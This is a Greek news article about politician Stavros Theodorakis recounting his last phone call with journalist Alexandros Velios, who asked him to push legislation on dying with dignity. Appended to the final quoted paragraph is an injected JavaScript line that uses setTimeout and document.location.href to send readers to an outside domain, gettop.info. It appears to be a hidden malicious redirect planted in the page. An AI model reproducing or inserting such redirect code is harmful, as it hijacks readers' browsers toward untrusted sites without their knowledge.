Με τον Στ. Θεοδωράκη συνομίλησε ο Αλ. Βέλιος λίγο πριν από το τέλος

0
10

 

Για την τηλεφωνική επικοινωνία που είχε ο Σταύρος Θεοδωράκης με τον Αλέξανδρο Βέλιο λίγο πριν εκείνος φύγει από τη ζωή μίλησε ο επικεφαλής του Ποταμιού σε ραδιοφωνική του συνέντευξη.

Κατά πληροφορίες, ο λόγος της επικοινωνίας έγινε για να παροτρύνει τον επικεφαλής του Ποταμιού να τηρήσει την υπόσχεσή του ότι θα συμβάλει έτσι ώστε να δημιουργηθούν οι συνθήκες στη χώρα μας για «να μπορούν οι άνθρωποι να φεύγουν με αξιοπρέπεια».

Ο Σταύρος Θεοδωράκης αναφέρθηκε στους δεσμούς φιλίας που είχε με τον Αλέξανδρο Βέλιο λέγοντας: «Τον Αλέξανδρο τον γνώρισα την εποχή που διεκδικούσαμε το δικαίωμα, διότι στην Ελλάδα δεν ήταν πάντα όλα αυτονόητα, να ιδρύονται ραδιοφωνικοί σταθμοί, δημοτικοί καταρχήν, ιδιωτικοί, ραδιόφωνα παρέας. Υπήρξε λοιπόν μία εποχή που το κυβερνητικό κόμμα, το ΠΑΣΟΚ τότε, έλεγε θα ρίξω τους δορυφόρους που θα εκπέμψουν ραδιοφωνικά προγράμματα στη χώρα. Εμείς μία παρέα ατάκτων στο ραδιόφωνο χωρίς καμία υποστήριξη, υποστηρίζαμε ότι θα πρέπει να δοθεί το δικαίωμα σε αυτούς τους σταθμούς να υπάρχουν. Ήμουν στο εγχείρημα του Ρούσου από την πρώτη μέρα και ο Αλέξανδρος Βέλλιος ήταν από αυτούς που βρίσκονταν στην πρώτη γραμμή».

Πρόσθεσε, αναφερόμενος στην τελευταία επικοινωνία που είχαν και αφορούσε νομοθετική πρωτοβουλία που ετοιμάζεται να αναλάβει το Ποτάμι: «Κατά μία συνωμοσία της τύχης εχθές το απόγευμα συνομίλησα με τον Αλέξανδρο καθώς βρέθηκα με έναν κοινό μας φίλο ο οποίος μου ανέφερε ότι με ψάχνει ο Αλέξανδρος. Τον πήρα τηλέφωνο και μου είπε ότι υπολογίζει να “φύγει” σε καμιά βδομάδα, ότι θέλει να το κάνει αξιοπρεπώς, ότι νιώθει πλήρης και ευτυχισμένος και μου ζήτησε να μην κάνω πίσω σε αυτό που και ο ίδιος ζητάει, στο να πάρουμε δηλαδή μία πολιτική πρωτοβουλία για το δικαίωμα των ανθρώπων να φεύγουν με αξιοπρέπεια. Του υποσχέθηκα ότι αυτό θα γίνει. Άλλωστε τις τελευταίες μέρες συνεργαζόταν με έναν βουλευτή μας για την ύπαρξη ενός νομοθετικού πλαισίου, μίας νομοθετικής πρότασης και είναι κάτι που θα το κάνουμε. Είπαμε ότι θα βρεθούμε από κοντά τις επόμενες μέρες, κάτι που πλέον δεν είναι δυνατό. Τον αποχαιρετώ και θα τον θυμάμαι σαν ένα τολμηρό, αξιοπρεπή και ασυμβίβαστο άνθρωπο». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here